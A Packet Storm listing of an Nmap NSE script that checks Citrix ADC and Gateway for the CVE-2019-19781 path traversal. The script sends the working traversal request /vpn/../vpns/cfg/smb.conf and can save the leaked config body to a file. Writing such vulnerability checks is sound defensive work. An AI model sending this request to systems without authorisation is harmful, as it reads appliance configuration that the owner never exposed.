
Citrix ADC / Gateway Path Traversal

🗓️ 16 Jan 2020 00:00:00Reported by Mishra DhirajType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 480 Views

Citrix ADC / Gateway Path Traversal CVE-2019-19781 vulnerability check

`# Exploit Title: Path Traversal in Citrix Application Delivery Controller  
(ADC) and Gateway.  
# Date: 17-12-2019  
# CVE: CVE-2019-19781  
# Vulnerability: Path Traversal  
# Vulnerability Discovery: Mikhail Klyuchnikov  
# Exploit Author: Dhiraj Mishra  
# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0  
# Vendor Homepage: https://www.citrix.com/  
# References: https://support.citrix.com/article/CTX267027  
# https://github.com/nmap/nmap/pull/1893  
  
local http = require "http"  
local stdnse = require "stdnse"  
local shortport = require "shortport"  
local table = require "table"  
local string = require "string"  
local vulns = require "vulns"  
local nmap = require "nmap"  
local io = require "io"  
  
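-- Text shown by `nmap --script-help`. It states what the check sends and what
-- it treats as evidence, so an operator can judge how far to trust a result.
description = [[
This NSE script checks whether the target server is vulnerable to
CVE-2019-19781, an unauthenticated path traversal in Citrix Application
Delivery Controller (ADC) and Gateway.

The check sends one unauthenticated GET request for /vpn/../vpns/cfg/smb.conf
and reports the host as vulnerable when the server answers 200 and the body
is matched against the "[global]" marker. Any other answer is reported as
not vulnerable, which does not by itself prove that the appliance is patched.
]]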
---  
-- @usage  
-- nmap --script https-citrix-path-traversal -p <port> <host>  
-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args output='file.txt'  
-- @output  
-- PORT STATE SERVICE  
-- 443/tcp open http  
-- | CVE-2019-19781:  
-- | Host is vulnerable to CVE-2019-19781  
-- @changelog  
-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)  
-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)  
-- @xmloutput  
-- <table key="NMAP-1">  
-- <elem key="title">Citrix ADC Path Traversal aka (Shitrix)</elem>  
-- <elem key="state">VULNERABLE</elem>  
-- <table key="description">  
-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,  
-- 11.1, 12.0, 12.1, and 13.0 are vulnerable to an unauthenticated path  
-- traversal vulnerability that allows attackers to read configurations or  
-- any other file.</elem>  
-- </table>  
-- <table key="dates">  
-- <table key="disclosure">  
-- <elem key="year">2019</elem>  
-- <elem key="day">17</elem>  
-- <elem key="month">12</elem>  
-- </table>  
-- </table>  
-- <elem key="disclosure">17-12-2019</elem>  
-- <table key="extra_info">  
-- </table>  
-- <table key="refs">  
-- <elem>https://support.citrix.com/article/CTX267027</elem>  
-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>  
-- </table>  
-- </table>  
  
-- Script metadata globals, assigned once when the script is loaded.
author = "Dhiraj Mishra (@RandomDhiraj)"

-- Credit for the original finder. NOTE(review): this looks like a plain extra
-- global rather than a standard NSE field -- confirm nothing reads it.
Discovery = "Mikhail Klyuchnikov (@__Mn1__)"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"

-- "intrusive" is listed, so the script is not part of the default set and
-- has to be selected explicitly.
categories = {
  "discovery",
  "intrusive",
  "vuln",
}

-- Port selection is delegated to the shortport library's SSL rule.
portrule = shortport.ssl
  
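--- Check one TLS port for the CVE-2019-19781 path traversal.
--
-- Sends a single GET for the traversal path and marks the host VULNERABLE
-- only when the reply is HTTP 200 and its body contains the literal text
-- "[global]". Every other outcome leaves the state at NOT_VULN, so a request
-- that is filtered, rewritten or blocked on the way also reads as "not
-- vulnerable"; treat that result as "no evidence", not as proof of patching.
--
-- When the <SCRIPT_NAME>.output script argument is set, the response body
-- (every non-alphanumeric character replaced by ".") is appended to that
-- file. The file then holds data read from the target, so store and share it
-- with the same care as the scan report itself.
--
-- @param host NSE host table; targetname or ip is used in messages.
-- @param port NSE port table; port.number is used for the request.
-- @return Result of vulns.Report:make_output, or nothing when the request
--         produced no HTTP status.
action = function(host, port)
  local outputFile = stdnse.get_script_args(SCRIPT_NAME .. ".output")
  local vuln = {
    title = 'Citrix ADC Path Traversal',
    state = vulns.STATE.NOT_VULN,
    description = [[
Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,
12.1, and 13.0 are vulnerable
to a unauthenticated path traversal vulnerability that allows attackers to
read configurations or any other file.
]],
    references = {
      'https://support.citrix.com/article/CTX267027',
      'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',
    },
    dates = {
      disclosure = {year = '2019', month = '12', day = '17'},
    },
  }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  local path = "/vpn/../vpns/cfg/smb.conf"
  local marker = "[global]"
  local target = host.targetname or host.ip

  local response = http.get(host, port.number, path)
  if not (response and response.status) then
    stdnse.print_debug("Request Failed")
    return
  end

  if response.status == 200 then
    -- A 200 can arrive without a body; treat that as "no marker found".
    local body = response.body or ""
    -- Plain-text search (4th argument true). As a Lua pattern, "[global]" is
    -- a character class that matches any single one of the letters g, l, o,
    -- b or a, so almost any 200 page would have been flagged as vulnerable.
    if string.find(body, marker, 1, true) then
      stdnse.print_debug("%s: %s GET %s - 200 OK", SCRIPT_NAME, target, path)
      vuln.state = vulns.STATE.VULN
      local citrixADC = ("Path traversal: https://%s:%d%s"):format(
        target, port.number, path)
      vuln.check_results = stdnse.format_output(true, citrixADC)

      if outputFile then
        local file, err = io.open(outputFile, "a")
        if file then
          -- gsub returns (string, count); the local keeps only the string so
          -- the replacement count is not written to the file.
          local sanitized = body:gsub('%W', '.')
          file:write(sanitized, "\n")
          file:close()
          -- NOTE(review): the message says "Credentials", but what is written
          -- is the sanitized response body -- confirm the wording.
          vuln.extra_info = stdnse.format_output(true,
            "Credentials are being stored in the output file")
        else
          -- Keep the finding even if the file cannot be opened.
          stdnse.print_debug("%s: cannot open output file %s: %s",
            SCRIPT_NAME, outputFile, tostring(err))
        end
      end
    end
  elseif response.status == 403 then
    -- NOTE(review): 403 is presumably the vendor mitigation answering the
    -- request -- confirm against CTX267027. The state is already NOT_VULN.
    stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, target, path,
      response.status)
    vuln.state = vulns.STATE.NOT_VULN
  end

  return vuln_report:make_output(vuln)
end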
`


16 Jan 2020 00:00Current
10High risk
Vulners AI Score10
EPSS0.99999
480